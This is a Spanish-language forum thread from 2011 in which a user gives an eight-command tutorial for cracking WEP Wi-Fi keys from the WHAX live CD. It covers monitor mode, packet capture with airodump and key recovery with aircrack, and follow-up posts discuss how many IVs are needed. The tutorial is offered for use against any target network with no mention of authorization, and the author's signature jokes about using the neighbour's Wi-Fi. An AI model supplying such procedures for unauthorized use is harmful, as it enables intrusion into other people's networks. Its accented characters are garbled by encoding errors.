23 de Mayo de 2017, 08:06:27 am
  • WPSdb - Base de Datos de Pines Online

Autor Tema: Rompiendo el cifrado WEP en 8 comandos [ipw2200]  (Leído 3723 veces)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.075
  • Reputación: +244/-2
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Rompiendo el cifrado WEP en 8 comandos [ipw2200]
« en: 18 de Febrero de 2011, 10:33:51 am »
Existen míltiples manuales para romper la seguridad de las redes Wireless cuando se utiliza el protocolo WEP, en este caso, ajustamos el entorno a las siguientes condiciones, distribuciín livecd WHAX, portatil Dell Latitude D610.
Dentro de la distribuciín tenemos todas las utilidades que vamos a necesitar.

Comenzamos..

Indicamos a la BIOS el inicio desde cdrom.

Tecleamos:
Código: [Seleccionar]
linux load=ipw2200

De esta forma se cargarí¡ el entorno necesario para hacer funcionar la tarjeta wifi.
...cuando se nos presenta la pantalla que nos habla de la configuraciín del entorno grí¡fico X, y nos indica la password del usuario root, indicamos:

Código: [Seleccionar]
login:root
passwd:toor

y a continuaciín tecleamos..

Código: [Seleccionar]
startx


Una vez iniciado el entorno grí¡fico, si no carga correctamente las X, habrí¡ que usar xconf, el entorno grí¡fico no es necesario, así­ que podrí­amos evitarnos este segundo paso e ir directamente al tercero.
Mediante el mení de navegaciín de WHAX, accedemos a una consola "Xterm" y tecleamos..

Código: [Seleccionar]
airmon.sh start eth0


Código: [Seleccionar]
airodump eth0 pruebas 0 1


(Apuntamos el nombre de la red (ESSID) y el canal (channel) a la que queremos acceder)
iwconfig eth0 mode monitor channel (canal) essid (essid)
 

Código: [Seleccionar]
iwconfig eth0 mode monitor channel (canal) essid (essid)

Código: [Seleccionar]
airmon.sh start eth0 (canal)

Código: [Seleccionar]
airodump eth0 (essid) (canal) 1


En este momento comienza la captura de paquetes, cuanto mayor sea el nímero de IVS mayor la posibilidad de obtener la clave, en nuestro caso con 240.998 IVS se obtuvo en 6 segundos. Las recomendaciones son de 1.000.000 de IVS para una clave WEP de 104 bits.
Una vez capturado este trí¡fico...

Código: [Seleccionar]
aircrack (essid).ivs

Y en un periodo breve de tiempo... nos mostrarí¡ la clave.

Existen diversos mítodos para acelerar la captura de trí¡fico en concreto de los IVS, pero no los explicaremos aquí­.

Notas: este procedimiento no estí¡ probado en situaciones distintas a las descritas en el documento.

El valor (essid) ha de sustituirse por el nombre de la red wifi cuya clave se quiere obtener.
El valor (canal) se ha de sustituir por el canal de la red donde se quiere capturar el trí¡fico.
« Última modificación: 17 de Febrero de 2012, 01:28:17 pm por Ò³Ò²Ò³ Dëmon Ò³Ò²Ò³ »
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado diego10

  • Premio
  • Usuario
  • *
  • Mensajes: 1.287
  • Reputación: +2148/-4
  • http://i.imgur.com/rfMt58x.png
  • awards Usuario con más de 1000 Posts! Usuario Registrado
    • Arg-Wireless. El primer foro de wireless de Argentina
    • Awards
Re:Rompiendo el cifrado WEP en 8 comandos [ipw2200]
« Respuesta #1 en: 18 de Febrero de 2011, 11:09:25 am »
240.998 IVS se obtuvo en 6 segundos y todavia explicas como hacerlo mas rapido? jaja que bueno
  • Antenas: https://www.youtube.com/user/MrDiegodieguez
  • Sistemas Operativos: iMac 21' late 2015 + iMac 27' late 2015 - macOS 10.12.5 (16F73)
  • Sistemas Operativos que utilizo para Auditar: iMac 21' late 2015 + iMac 27' late 2015 - macOS 10.12.5 (16F73)
  • Dispositivos Inalambricos: ALFA AWUS036H + 3x TPSTATION WA5210G + AirPort Time Capsule 2TB + Mikrotik RB941-2nD hAP lite

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.075
  • Reputación: +244/-2
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Rompiendo el cifrado WEP en 8 comandos [ipw2200]
« Respuesta #2 en: 18 de Febrero de 2011, 02:12:01 pm »
240.998 IVS se obtuvo en 6 segundos y todavia explicas como hacerlo mas rapido? jaja que bueno

teoricamente no?; porque supone; la sacas en 6 segundos pero esperaste 2 horas hasta que juntaste 240.xxx...  :P y nadie quiere esperar; con 25.xxx; por experiencias mí­as... es lo mí­nimo, si inyecta muy lento llegas a 25.xxx o 27.xxx y la crackeas en 1 minuto, si la contraseíña es de 6 dí­gitos: juanma... pero todo depende segín la red.

siempre es recomendable 50.xxx; pero no es tan necesario; si tenemos una entrada de 120 por segundo variando a 80 con 27.xxx se saca... si tenemos una entrada de 400 o 500 eso es mejor y ahi si; aguantas un cacho mí¡s y la crackeas con 50.xxx..
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD